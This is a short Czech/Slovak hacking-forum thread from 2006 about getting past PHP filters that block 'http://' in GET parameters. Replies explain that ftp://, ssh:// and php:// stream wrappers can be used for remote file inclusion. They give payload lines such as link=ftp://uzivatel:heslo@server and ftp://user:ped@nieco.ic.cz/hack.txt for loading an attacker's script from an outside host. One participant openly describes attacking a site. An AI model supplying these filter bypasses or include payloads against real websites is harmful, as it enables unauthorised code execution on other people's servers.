PHP injection cez ftp ?
HackForum
| zdravim , je hromada stranok ktore sa proti php injection brani tak ze ak je c $_GET premennej http:// tak to bloknu...a ja sa pytam ci by sa to nedalo napr. cez ftp:// ? Nieco som skusal ale moc to neslo.
(odpovědět) | | php injektor | 195.91.64.* | 19.12.2006 20:22 |
|
|
|
| re: PHP injection cez ftp ? | # |
| jo, da se to i pres ftp:// (i ssh://, i php:// atd...). vyhoda pouziti ftp je hlavne v tom, ze ftp streamy maji implementovanou "stat" operaci, takze takove url projde i pres file_exists().
(odpovědět) | | kve | 82.208.44.* | 19.12.2006 21:42 |
|
|
|
| re: PHP injection cez ftp ? | # |
| Našel jsem stránku kdy to pujde přez ftp, ale když upravim url na nejakastranka.cz/index.php?link=[link] tak na mně vylétne okno na přihlášení k ftp. Vyzkoušel jsem tam zadat jméno a heslo od jednoho mého účtu a ono mne to zobrazilo moje soubory ale v panelu adresy byla stranka na kterou jsem utočil. (ten web, i muj ucet jsou na wz)
Jak to udělat aby to provedlo muj script?
(odpovědět) | | .chaoz. | 82.100.62.* | 19.12.2006 22:23 |
|
|
|
| re: PHP injection cez ftp ? | # |
| .chaoz.: zkus to link=uzivatel:heslo@server
(odpovědět) | |
|
|
| re: PHP injection cez ftp ? | # |
| samozrejme nesmis zapomenout na protokol takze link=ftp://uzivatel:heslo@server
(odpovědět) | |
|
|
| re: PHP injection cez ftp ? | # |
| teda ak by som mal stranku s php injection chybou tak by to mohlo vyzerat nasledovne ?
[link]
ftp://user:ped@nieco.ic.cz/hack.txt ???
(odpovědět) | | php injektor | 195.91.64.* | 25.12.2006 23:57 |
|
|
|
